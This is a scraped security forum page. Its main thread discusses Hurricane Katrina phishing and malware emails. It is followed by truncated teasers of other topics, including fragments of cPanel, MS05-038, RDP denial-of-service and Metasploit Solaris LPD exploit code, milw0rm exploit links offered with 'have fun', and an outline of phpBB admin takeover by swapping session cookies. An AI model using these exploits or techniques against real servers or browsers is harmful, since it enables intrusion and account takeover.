In the wake of hurricane Katrina, several online scams have begun to circulate the Internet, according to several security firms. Sophos warned users on Thursday not to open a malware-Infected e-mail posing as news on the disaster.
Possible subject lines of the e-mail could be
QUOTE
"Re: g8 Tropical storm flooded New Orleans", "Re: g7 80 percent of our city underwater", and "Re: q1 Katrina killed as many as 80 people".
The group said there could be additional variants.
BetaNews on Thursday morning had received a variant of the above e-mails, however it appeared that the variance is the letter and number combination following the "Re:" prefix.
In the body of the message, clicking on the "Read More.." link will take the user to a malicious Web site that poses as a news story. In reality, the site uses code to exploit vulnerabilities within Internet Explorer to install malware including the Troj/Cgab-A Trojan horse.
From there, the attacker could remotely access the user's computer.
QUOTE
"Receiving or reading the emails themselves does not mean you are infected," Graham Cluley, senior technology consultant for Sophos said.
The SANS Institute is reporting that there are several e-mails soliciting donations through a Paypal link. According to SANS, it may be difficult to tell whether the e-mail is from a legitimate organization.
QUOTE
"The hurricane is a dreadful natural disaster, and it's sickening to think that hackers are prepared to exploit the horrendous situation in an attempt to break into computers for the purposes of spamming, extortion and theft," added Cluley.
After discovery of the sites yesterday, several have been removed. "There are now about 230 .com domains that contain the strings 'katrina' and 'hurricane'.
QUOTE
We will make a list of more domains like this public soon to ask for your help to review them,"
It seems to me that they pre-wrote those scripts or exploits before hand. And it seems like a good idea for them to release their creation once the weather tragidy occurred. I'm telling you--there are people who don't even have a soul, a simple common decency anymore these days.
I haven't received any email relating this post but I'll be on the look out. Good post.
By the way, nelimitat, if you are going to use quotes from someone else and use the whole phrase or a sentence, you MUST use
Boy, people are just sick!! Boy some people just don't have lives or morals. I'll pass this post on and be on the lookout. Thanks for this post Nelimitat.
Does anyone know where to report e-mails we get like this or anything? I know there are some organizations that track where a mal-ware attack comes from then arrest the hackers. Anybody know where to report stuff like this?
I think my Dad might know, i'll ask him and tell you guys if I know anything.
That is soo inhuman of them i mean they even write how many people have been killed for the subject of the virus email so sad and i know some people somewhere have fallen victim of this sick trick. Does anyone know if the virus writers were caught? i hope they did.
They deserve to have their limbs amputated and made to sit in front of a computer screen playing "They're Taking the Hobbits to Isengard" on "repeat" eternally.
Why do people take advantage of disasters. People's lives are on the line here and instead of the money going to helping people it goes to some guy who is sitting at his computer watching the money flow in from people who want to help people that need the money.
well it didn't take long for this to pop up, i think scammers started programming right after it hit and if it was a bad one (and it was) they would be ready for it, but you would think people would have common sense to donate money online, i think the email alone would give it away that the person is not legit, but hey its their money not mine.
Cpanel Exploit
- security hole in cPanel to hack the servers of a hosting company (8)
A pair days ago I read this new on Slashdot: cPanel Exploit Used to Circulate IE Exploit
QUOTE "In a dangerous combination of unpatched exploits, hackers have used a previously
undiscovered security hole in cPanel to hack the servers of a hosting company and use hundreds of
hijacked sites to infect Internet Explorer users with malware using the unpatched VML exploit.
cPanel, whose hosting automation software is used by many large hosting companies, has issued a fix.
It's a local exploit, meaning the attacker must control a cPanel account on the target hosti...
I just got a new laptop, and of course it's loaded with vista. Everything works awesomly!
(my last PC was from 2001, BIG DIFF.) But the damned thing compulsivly and automatically sets
Internet Explorer to my default browser and won't let me change certain things which browsers
will typically handle. 've manually changed it so Firefox handles all the stuff except HTTPS
and what not (CANNOT CHANGE W/O HACK!), but IE just bumps in every time I want to click a link
from a non-browser based file /sad.gif" style="vertical-align:middle" emoid=":(" border="...
On monday it was reported that Quicktime 7.2 and 7.3 versions come with a new exploit in which
malware could on to a person's computer through streaming videos. They only mention that XP and
Vista are the only affect systems and no word came about on the Mac operating system. They mention
that a buffer overflow bug was made in which it "contains a stack buffer overflow vulnerability in
the way Quicktime handles the RTSP Content-Type header." For those who don't know what RTSP is,
RTSP is the Real-Time Streaming Protocol which apple uses for its QuickTime softw...
Link to Article: http://news.com.com/Hackers+claim+zero-day..._3-6121608.html Thought this was
interesting. Really caught me offgaurd, didn't expect such a huge flaw on a GPL based program.
Whats even more scary is they said they have about 30 other flaws found......
I was on MSNBC.com and read this article QUOTE YONKERS, N.Y. - The State of the Net survey by
Consumer Reports projects that American consumers lost more than $8 billion over the last two
years to viruses, spyware and various schemes. Additionally, it shows consumers face a 1-in-3
chance of becoming a cybervictim -- about the same as last year. According to the survey, consumers
lost $630 million over the past two years to e-mail scams. They also spent at least $7.8
billion for computer repairs, parts, and replacement over the past two years to co...
A friend of mine was temporarily banned from the computers at my school a while ago after he
accidentially found a way into Task Manager, which is disabled on our network. He has had his
permissions restored now, but has no idea why he got banned in the first place. However, recently he
explained what he did to me, and I tested it. I soon found out that, by accident, we had both
discovered that there is a Security Exploit in networking Windows XP Professional. The exploit is
to do with network permissions. Windows XP recieves the permission data from the network as soon...
QUOTE Earlier this week, I blogged about a site doing a bunch of different exploits, depending
on what you are running. One of the things the site will do is detect if you have Firefox, and
attempt to exploit it, using the InstallVersion.compareTo() vulnerability. Read More with
images Already found to be copying and pasting. Take this time to review our forum rules. Warning. ...
I'm receiving the folloing quoted messages from mail@yahoo.com with zip file as an attachment. I
am quite disturbed with the message. Could this message be true Or should I ignore it? As far as my
knowledge is concerned I have never sent any spam messages using my yahoo mail account. And I hate
spam messages too. What if they eventually close down my yahoo email ID!! /sad.gif'
border='0' style='vertical-align:middle' alt='sad.gif' /> Does anyone get the same message? The
thing is that this mail reaches to my Junk mailbox too. Please give your opinion!...
For Internet Explorer users, please note that there is a new exploit in the wild that is capable of
compromising a fully patched and updated WinXP machine:
http://www.eweek.com/article2/0,1759,18917...3119TX1K0000594 Microsoft has not released a fix yet.
From the article: QUOTE IE users should immediately disable Active Scripting via the Tools >
Internet Options > Security tab > Custom Level feature. Firefox and other alternative web
browsers are not affected. You would have to be tricked into going to a malicious website to have
any chance of being affecte...
Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution
vulnerability. /* cPanel */ //headers #include //In/Out #include //sockets functions
#include //memory functions #include //strlen,strcat,strcpy #pragma comment(lib,"ws2_32.lib")
//for compile with dev-c++ link to "libws2_32.lib" #define Port 2082 //port for connect to cPanel
#define SIZE 1024 //buffer size to receive the data /*connect host:port*/ SOCKET Conecta(char
*Host, short puerto) { /*struct for make the socket*/ WSADATA wsaData; SOCKET Winsock;//l...
Hello everyone. This is FuRy your local 1UP resident. I have great news. Antihack is now online and
ready to serve your every need. They specialize in security and if your computer is running slow and
this happens often do to viruses and spyware. You should check out they can make it so that you
dont get viruses and spyware. They can even stop hacking issues. They walk you through everything
and even test your security before and after to show you the difference. Anyway just telling yah
have fun and later Removed link, post only made for advertising, and topic closed....
Another vulnerability in PHPbb based forums that can be used to easily gain any user level access to
the forum. Even the admin account is not not secure with the default setup. Click Here for more
details about -"How to be Admin on phpBB in Simple steps!" And here is the Homepage of
PHPbb and click here to download the latest version....
Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038)
/*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11
http://www.donews.net/zwell zwell@sohu.com Some code belongs to Lion(cnhonker), regards to him.
This code tested on Windows 2003 -----------------------------------------------*/ #include
#include #pragma comment(lib, "ws2_32") // Use for find the ASM code #define PROC_BEGIN __asm
_emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm
_emit 0x90\...
Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041) // Windows XP SP2
'rdpwd.sys' Remote Kernel DoS // // Discovered by: // Tom Ferris // tommy
security-protocols com // // Tested on: // Microsoft Windows XP SP2 // // Usage (SPIKE) :
./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0 // // 8/9/2005 Security-Protocols.com // //
This program is free software; you can redistribute it and/or modify it under // the terms of the
GNU General Public License version 2, 1991 as published by // the Free Software Foundation.
s_block_start("packet_1...
## # This file is part of the Metasploit Framework and may be redistributed # according to the
licenses defined in the Authors field below. In the # case of an unknown or missing license, this
file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest #
version of the Framework can always be obtained from metasploit.com. ## package
Msf::Exploit::solaris_lpd_unlink; use base "Msf::Exploit"; use IO::Socket; use IO::Select; use
strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'Solaris
LPD Arbit...
another internet explorer aecurity hole! /blink.gif' border='0' style='vertical-align:middle'
alt='blink.gif' /> here 's the exploit : http://www.milw0rm.com/id.php?id=1148 ...
wow, you can get this famous vulnerabilty exploit here: http://www.milw0rm.com/id.php?id=1149
have fun /smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> ...
Recently, an exploit has been found out that allows people to use their cookies to gain access to
the ACP. And Firefox assists with it /ohmy.gif' border='0' style='vertical-align:middle'
alt='ohmy.gif' /> ! Basically what happens that is when you visitthe phpBB forum, it logs a
cookie containing your Session ID (Basically who and when you are). What it does, after much
decoding and encoding, is allows you to replace your SID with the admin's, thus enabling them to
gain access. To fix this, upgrade to the latest version of phpBB, 2.0.13. Dun dun dunnnnn! B...
Express your Opinions, Thoughts or Contribute more info. to help others.
Ask your Doubts & Queries to get answers, So that "Together We can help others!"
Register FREE for AD-FREE
forum, Create your own topics, Ask Questions, track topics, setup
subscriptions & notifications and Get a Free Website w/ Email and FTP.
